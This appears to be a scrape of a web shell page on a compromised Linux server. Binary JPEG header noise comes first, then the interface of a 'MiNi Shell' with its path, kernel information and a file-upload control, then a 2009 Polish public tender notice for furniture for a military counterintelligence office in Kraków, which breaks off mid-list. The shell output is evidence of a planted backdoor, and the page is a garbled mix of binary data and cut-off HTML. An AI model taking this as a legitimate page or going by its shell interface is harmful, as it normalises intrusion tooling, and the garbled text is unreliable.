JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090923/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090923/162311-N-2009.html

<p class="kh_header"><b>Kraków 50: Przedmiotem zamówienia jest dostawa mebli biurowych, gabinetowych oraz kuchennych(oznaczenie sprawy: ZP-1-IK-2009)</b><br>
<b>Numer ogłoszenia: 162311 - 2009; data zamieszczenia: 23.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Inspektorat Służby Kontrwywiadu Wojskowego w Krakowie , ul. Lucjana Rydla 54, 30-901 Kraków 50, woj. małopolskie, tel. 0-12 455 74 34, faks 0-12 455 40 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.skw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa mebli biurowych, gabinetowych oraz kuchennych(oznaczenie sprawy: ZP-1-IK-2009).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia1)	Przedmiotem zamówienia jest dostawa mebli biurowych, gabinetowych i kuchennych (zwanych dalej -meblami), zgodnie ze wszystkimi wymogami Zamawiającego określonymi w niniejszej SIWZ, w tym zgodnie z załączonymi opisami przedmiotu zamówienia stanowiącymi Załączniki nr 2.1, 2.2, 2.3  do niniejszej SIWZ. 2)	Przedmiot zamówienia podzielony został na 3 zadania ofertowe (części) wymienione poniżej:Zadanie ofertowe nr 1 - dostawa mebli biurowych:Kod CPV: 39130000-2Dostawa mebli biurowych wyszczególnionych poniżej: (szczegółowy opis mebli biurowych stanowi Załącznik nr 2.1. do SIWZ).1.Fotel biurowy obrotowy -55 szt.;2.Biurko, (wym. 150 cm × 70 cm × 75cm) -4 szt.;3.Biurko narożne lewe - 1 szt.;4.Biurko komputerowe narożne lewe -1 szt.;5.Biurko komputerowe narożne prawe (kolor akacja) -2 szt.;6.Dostawka do biurka - 3 szt.;7.Kontener do biurka - szufladkowy -3 szt.;8.Biurko kątowe-1 szt.;9.Szafa ubraniowa 1-drzwiowa -3 szt.;10.Podstawa komputera (kolor akacja) -4 szt.;11.Szafka biblioteczna 1, (wym. 50 cm×30 cm ×190 cm) -3 szt.;12.Szafka aktowa -3 szt.;13.Regał narożny -3 szt.;14.Krzesło biurowe 1 (kolor akacja) -3 szt.;15.Krzesło biurowe 2 (kolor wiśnia oxford) -60 szt.;16.Szafa ubraniowa 1, 2-drzwiowa,(wym. 120 cm×60 cm ×160 cm)-10 szt.;17.Nadstawka do szafy ubraniowej 1 - 10 szt.;18.Szafa ubraniowa 2, 2-drzwiowa,(wym. 100 cm×60 cm ×160 cm) - 17 szt.;19.Nadstawka do szafy ubraniowej 2 - 17 szt.;20.Szafka biblioteczna 2, (wym. 60 cm×40 cm ×205 cm) - 25 szt.;21.Stolik kwadratowy - 70 szt.;22.Kontener do biurka - szafkowy - 35 szt.;23.Biurko komputerowe narożne prawe, (kolor wiśnia oxford) -1 szt.;24.Podstawa  komputera (kolor wiśnia oxford) -1 szt.;25.Biurko komputerowe,(wym. 120 cm×70 cm ×75cm) - 45 szt.;26.Wieszak - 28 szt.;27.Ława,(wym. 80 cm×60 cm ×55 cm) - 4 szt.;28.Stolik pod drukarkę - 45 szt.;29.Stolik pod kserokopiarkę -5 szt.;30.Krzesłokonferencyjne - 40 szt.;31.Lada recepcyjna - 4 szt.;Zadanie ofertowe nr 2 - dostawa mebli gabinetowych:Kod CPV: 39150000-8, 39143110-0Dostawa mebli gabinetowych (Zestaw gabinetowy I i II) wyszczególnionych poniżej: (szczegółowy opis mebli gabinetowych stanowi Załącznik nr 2.2 do SIWZ).Zestaw I1.Biurko gabinetowe 1,(kolor mahoń, wym. 160 cm × 75 cm × 75cm) - 4 szt.;2.Stolik pod komputer gabinetowy 1,(kolor mahoń, wym. 100 cm × 75 cm × 75) - 4 szt.;3.Łącznik do biurka 1,(kolor mahoń) -4 szt.;4.Dostawka do biurka 1(kolor mahoń)- 2 szt.;5.Szafa ubraniowa 1(kolor mahoń)-1 szt.;6.Segment regału -1 szt.;7.Komoda z drzwiczkami szklanymi -1 szt.;8.Stolik okolicznościowy 1, (kolor mahoń, wym. 65 cm × 65 cm × 55) -	1 szt.;9.Fotel gabinetowy -7 szt.;10.Fotel do ławy 1 -5 szt.;11.Stolik okolicznościowy 2,(kolor wenge, wym. 55 cm × 55 cm × 50) -1 szt.;12.Szafa ubraniowa 2, (podzielona na dwie części) -1 szt.;13.Szafa ubraniowa 3-1 szt.;14.Nadstawka 1 do szafy ubraniowej,(kolor wenge)-2 szt.;15.Podstawa komputera 1, (kolor wenge) -1 szt.;16.Biurko komputerowe gabinetowe narożne lewe 1,(kolor wenge)-1 szt.;17.Dostawka do biurka 2,(kolor wenge)-	1 szt.;18.Stół konferencyjny prostokątny 1,(kolor wenge, wym. 130 cm × 65 cm × 75)-1 szt.;19.Krzesła do stołu konferencyjnego 1-4 szt.;20.Komoda 1 ,(kolor wenge, wym. 115 cm × 40 cm × 115)-	1 szt.;21.Szafa ubraniowa 4-2 szt.;22.Nadstawka  2 do szafy ubraniowej,(wym. 100 cm × 60 cm × 55)- 2 szt.;23.Szafka biblioteczna -2 szt.;24.Biurko gabinetowe 2,(kolor mahoń, wym. 120 cm × 65 cm × 75)-1 szt.;25.Stolik pod komputer gabinetowy 2,(kolor mahoń, wym. 100 cm × 65 cm × 75)-	1 szt.;26.Łącznik do biurka 2-1 szt.;27.Stół konferencyjny prostokątny 2,(kolor mahoń, wym. 130 cm × 65 cm × 75) -	1 szt.;28.Krzesła do stołu konferencyjnego 2-5 szt.;29.Komoda 2,(kolor mahoń, wym. 115 cm × 40 cm × 115)-1 szt.;30.Stolik okolicznościowy 3,(kolor mahoń, wym. 55 cm × 55 cm × 50) -2 szt.;31.Fotel do ławy 2 -4 szt.;32.Wieszak-5 szt.;33.Biurko komputerowe gabinetowe narożne lewe 2,(kolor mahoń) -1 szt.;34.Podstawa komputera 1(kolor mahoń)-	2 szt.;35.Stół konferencyjny na nogach płytowych -3 szt.;36.Krzesła do stołu konferencyjnego z wysokim oparciem -20 szt.;37.Szafa ubraniowa 5-3 szt.;38.Nadstawka 3 do szafy ubraniowej,(wym. 120 cm × 60 cm × 55) -3 szt.;39.Stolik okolicznościowy 4,(kolor mahoń, wym. 65 cm × 65 cm × 50)-	3 szt.;40.Fotel do ławy 3-7 szt.;41.Komoda 3, (kolor mahoń, wym. 100 cm × 50 cm × 90) -3 szt.;Zestaw II1.Biurko gabinetowe -1 szt.;2.Stolik pod komputer -1 szt.;3.Łącznik do biurka -1 szt.;4.Dostawka do biurka -2 szt.;5.Stół konferencyjny-1 szt.;6.Krzesła do stołu konferencyjnego-10 szt.;7.Szafa ubraniowa-1 szt.;8.Segment regału-1 szt.;9.Segment regału z barkiem-1 szt.;10.Komoda z drzwiczkami szklanymi-1 szt.;11.Fotel gabinetowy-1 szt.;12.Sofa rozkładana-1 szt.;13.Ława okolicznościowa-1 szt.;14.Fotele do ławy-2 szt.;15.Szafa biblioteczna-1Zadanie ofertowe nr 3 - dostawa mebli kuchennych:Kod CPV: 39150000-8, 39143110-0Dostawa mebli kuchennych wyszczególnionych poniżej: (szczegółowy opis mebli kuchennych stanowi Załącznik nr 2.3 do SIWZ).1.Szafka stojąca z szufladą 1, (wym. 60 cm × 85 cm × 60-65)- 2 szt.;2.Szafka stojąca z szufladą 2,(wym. 80 cm × 85 cm × 60-65)- 2 szt.;3.Szafka pod zlewozmywak-3 szt.;4.Szafka wisząca 1, (wym. 80 cm × 70-75 cm × 35-40)- 2 szt.;5.Szafka wisząca, (do zamontowania okapu kuchennego)- 3 szt.;6.Szafka wisząca na suszarkę-3 szt.;7.Szafka wisząca 2, (wym. 60 cm × 70-75 cm × 35-40)-2 szt.;8.Stół kuchenny (rozkładany)- 3 szt.;9.Krzesło do stołu kuchennego-6 szt.;10.Narożnik kuchenny wyściełany-2 szt.;7)	Wybrany w toku procedury przetargowej Wykonawca przekaże Zamawiającemu szczególne instrukcje konserwacji mebli.8)	Dostawa obejmuje dostarczenie mebli do Zamawiającego, jak również ich montaż, który zostanie wykonany bezpośrednio po ich dostarczeniu, lub w terminie późniejszym, po uprzednim ustaleniu terminu jego wykonania przez osoby nadzorujące wykonanie umowy, jednak nie później, niż w terminie 7 dni od dnia przekazania takiej informacji od Zamawiającego do Wykonawcy.9)	Zamawiający wymaga aby dostarczane meble były fabrycznie nowe.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.15.00.00-8, 39.14.31.10-0, 39.14.10.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają wymagania określone w art. 22 ust. 1 ustawy, tj.:a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy). 2)	Zamawiający będzie oceniał spełnianie w/w wymagań jako spełnia/nie spełnia na podstawie złożonych oświadczeń i dokumentów wymienionych w rozdziale VII SIWZ. 3)	Wykonawca może spełniać albo nie spełniać warunków udziału w postępowaniu, oceny spełniania warunków nie stopniuje się. 4)	Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, jeżeli będzie to wynikało z oświadczeń i dokumentów, o których mowa w rozdziale VII SIWZ, złożonych wraz z ofertą, z zastrzeżeniem art. 26 ust. 3 ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	W celu potwierdzenia, spełniania warunków udziału w postępowaniu Wykonawcy dostarczą      wraz z ofertą następujące oświadczenia i dokumenty: e)	pisemne oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu (Załącznik nr 3 do SIWZ) zgodnie z art. 22 ust. 1 ustawy, z tym, że w przypadku, gdy Wykonawca nie dysponuje potencjałem technicznym lub osobami zdolnymi do wykonania zamówienia, do oferty załącza odpowiednie pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia;f)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;2)	Dokument, o którym mowa w pkt 1) lit. b) oraz zobowiązania podmiotów do udostępnienia potencjału technicznego lub osób zdolnych do wykonania zamówienia mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku poświadczania za zgodność z oryginałem kopii dokumentów przez osoby nie wymienione w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza lub przez wystawcę pełnomocnictwa.3)	Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 1) lit. b) składają dokumenty zgodnie z przepisami Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późn. zm.), tj. dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.4)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.5)	W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie (np. w formie tzw. konsorcjum) Zamawiający wymaga:a)	aby wraz z ofertą Wykonawcy wspólnie ubiegający się o zamówienie przedłożyli dokument (np. pełnomocnictwo) określający co najmniej jego zakres, strony występujące wspólnie oraz wskazujący pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia (pełnomocnictwo winno być przedstawione w formie oryginału, lub kopii potwierdzonej notarialnie, bądź przez jego wystawcę);Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (art. 23 ustawy) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;b)	podpisania oferty przez pełnomocnika;c)	złożenia kompletu dokumentów wymaganych przez Zamawiającego;d)	w przypadku oświadczenia, o którym mowa w pkt. 1) lit. a)-	w zakresie art. 22 ust. 1 pkt 1-3 ustawy oświadczenie podpisał pełnomocnik Wykonawców wspólnie ubiegających się o zamówienie, gdyż Zamawiający będzie brał pod uwagę łączne uprawnienia Wykonawców do wykonywania działalności/czynności wchodzących w zakres zamówienia, ich łączny potencjał techniczny, kadrowy, kwalifikację, wiedzę i doświadczenie, a także ich łączną sytuację ekonomiczną i finansową,-	w zakresie art. 22 ust. 1 pkt 4 ustawy oświadczenie złożył i podpisał każdy z Wykonawców wspólnie ubiegających się o zamówienie (każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi oddzielnie udokumentować fakt, że nie podlega wykluczeniu z postępowania);e)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa dokument określony w pkt. 1) lit. b); f)	wypełniając dokumenty powołujące się na Wykonawcę, w miejscu -nazwa i adres Wykonawcy- należy wpisać dane dotyczące pełnomocnika.UWAGA:Spółka cywilna nie jest przedsiębiorcą, natomiast wspólnicy s.c. w ramach wykonywanej przez nich działalności gospodarczej uznawani są za przedsiębiorców i to wspólnicy są podmiotem praw i obowiązków z tytułu prowadzonej działalności. Oferta składana przez spółki cywilne jest traktowana jako oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 23 ustawy).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.skw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kraków, ul. Rydla 54, tel. 0-12 455 42 40..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 10:00, miejsce: Sekretariat Inspektoratu SKW w Krakowie poprzez Kancelarię Jawną ISKW mieszczącą się przy ul. Rydla 54 ( tel. 0-12 455 42 40), w godz. 8:00-15:00, w dni robocze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie ofertowe nr 1 - dostawa mebli biurowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie ofertowe nr 1 - dostawa mebli biurowych:Kod CPV: 39130000-2. Dostawa mebli biurowych wyszczególnionych poniżej: (szczegółowy opis mebli biurowych stanowi Załącznik nr 2.1. do SIWZ).1.Fotel biurowy obrotowy -55 szt.;2.Biurko, (wym. 150 cm × 70 cm × 75cm) -4 szt.;3.Biurko narożne lewe - 1 szt.;4.Biurko komputerowe narożne lewe -1 szt.;5.Biurko komputerowe narożne prawe (kolor akacja) -2 szt.;6.Dostawka do biurka - 3 szt.;7.Kontener do biurka - szufladkowy -3 szt.;8.Biurko kątowe-1 szt.;9.Szafa ubraniowa 1-drzwiowa -3 szt.;10.Podstawa komputera (kolor akacja) -4 szt.;11.Szafka biblioteczna 1, (wym. 50 cm×30 cm ×190 cm) -3 szt.;12.Szafka aktowa -3 szt.;13.Regał narożny -3 szt.;14.Krzesło biurowe 1 (kolor akacja) -3 szt.;15.Krzesło biurowe 2 (kolor wiśnia oxford) -60 szt.;16.Szafa ubraniowa 1, 2-drzwiowa,(wym. 120 cm×60 cm ×160 cm)-10 szt.;17.Nadstawka do szafy ubraniowej 1 - 10 szt.;18.Szafa ubraniowa 2, 2-drzwiowa,(wym. 100 cm×60 cm ×160 cm) - 17 szt.;19.Nadstawka do szafy ubraniowej 2 - 17 szt.;20.Szafka biblioteczna 2, (wym. 60 cm×40 cm ×205 cm) - 25 szt.;21.Stolik kwadratowy - 70 szt.;22.Kontener do biurka - szafkowy - 35 szt.;23.Biurko komputerowe narożne prawe, (kolor wiśnia oxford) -1 szt.;24.Podstawa  komputera (kolor wiśnia oxford) -1 szt.;25.Biurko komputerowe,(wym. 120 cm×70 cm ×75cm) - 45 szt.;26.Wieszak - 28 szt.;27.Ława,(wym. 80 cm×60 cm ×55 cm) - 4 szt.;28.Stolik pod drukarkę - 45 szt.;29.Stolik pod kserokopiarkę -5 szt.;30.Krzesłokonferencyjne - 40 szt.;31.Lada recepcyjna - 4 szt.;.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie ofertowe nr 2 - dostawa mebli gabinetowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mebli gabinetowych (Zestaw gabinetowy I i II) wyszczególnionych poniżej: (szczegółowy opis mebli gabinetowych stanowi Załącznik nr 2.2 do SIWZ).Zestaw I1.Biurko gabinetowe 1,(kolor mahoń, wym. 160 cm × 75 cm × 75cm) - 4 szt.;2.Stolik pod komputer gabinetowy 1,(kolor mahoń, wym. 100 cm × 75 cm × 75) - 4 szt.;3.Łącznik do biurka 1,(kolor mahoń) -4 szt.;4.Dostawka do biurka 1(kolor mahoń)- 2 szt.;5.Szafa ubraniowa 1(kolor mahoń)-1 szt.;6.Segment regału -1 szt.;7.Komoda z drzwiczkami szklanymi -1 szt.;8.Stolik okolicznościowy 1, (kolor mahoń, wym. 65 cm × 65 cm × 55) -	1 szt.;9.Fotel gabinetowy -7 szt.;10.Fotel do ławy 1 -5 szt.;11.Stolik okolicznościowy 2,(kolor wenge, wym. 55 cm × 55 cm × 50) -1 szt.;12.Szafa ubraniowa 2, (podzielona na dwie części) -1 szt.;13.Szafa ubraniowa 3-1 szt.;14.Nadstawka 1 do szafy ubraniowej,(kolor wenge)-2 szt.;15.Podstawa komputera 1, (kolor wenge) -1 szt.;16.Biurko komputerowe gabinetowe narożne lewe 1,(kolor wenge)-1 szt.;17.Dostawka do biurka 2,(kolor wenge)-	1 szt.;18.Stół konferencyjny prostokątny 1,(kolor wenge, wym. 130 cm × 65 cm × 75)-1 szt.;19.Krzesła do stołu konferencyjnego 1-4 szt.;20.Komoda 1 ,(kolor wenge, wym. 115 cm × 40 cm × 115)-	1 szt.;21.Szafa ubraniowa 4-2 szt.;22.Nadstawka  2 do szafy ubraniowej,(wym. 100 cm × 60 cm × 55)- 2 szt.;23.Szafka biblioteczna -2 szt.;24.Biurko gabinetowe 2,(kolor mahoń, wym. 120 cm × 65 cm × 75)-1 szt.;25.Stolik pod komputer gabinetowy 2,(kolor mahoń, wym. 100 cm × 65 cm × 75)-	1 szt.;26.Łącznik do biurka 2-1 szt.;27.Stół konferencyjny prostokątny 2,(kolor mahoń, wym. 130 cm × 65 cm × 75) -	1 szt.;28.Krzesła do stołu konferencyjnego 2-5 szt.;29.Komoda 2,(kolor mahoń, wym. 115 cm × 40 cm × 115)-1 szt.;30.Stolik okolicznościowy 3,(kolor mahoń, wym. 55 cm × 55 cm × 50) -2 szt.;31.Fotel do ławy 2 -4 szt.;32.Wieszak-5 szt.;33.Biurko komputerowe gabinetowe narożne lewe 2,(kolor mahoń) -1 szt.;34.Podstawa komputera 1(kolor mahoń)-	2 szt.;35.Stół konferencyjny na nogach płytowych -3 szt.;36.Krzesła do stołu konferencyjnego z wysokim oparciem -20 szt.;37.Szafa ubraniowa 5-3 szt.;38.Nadstawka 3 do szafy ubraniowej,(wym. 120 cm × 60 cm × 55) -3 szt.;39.Stolik okolicznościowy 4,(kolor mahoń, wym. 65 cm × 65 cm × 50)-	3 szt.;40.Fotel do ławy 3-7 szt.;41.Komoda 3, (kolor mahoń, wym. 100 cm × 50 cm × 90) -3 szt.;Zestaw II1.Biurko gabinetowe -1 szt.;2.Stolik pod komputer -1 szt.;3.Łącznik do biurka -1 szt.;4.Dostawka do biurka -2 szt.;5.Stół konferencyjny-1 szt.;6.Krzesła do stołu konferencyjnego-10 szt.;7.Szafa ubraniowa-1 szt.;8.Segment regału-1 szt.;9.Segment regału z barkiem-1 szt.;10.Komoda z drzwiczkami szklanymi-1 szt.;11.Fotel gabinetowy-1 szt.;12.Sofa rozkładana-1 szt.;13.Ława okolicznościowa-1 szt.;14.Fotele do ławy-2 szt.;15.Szafa 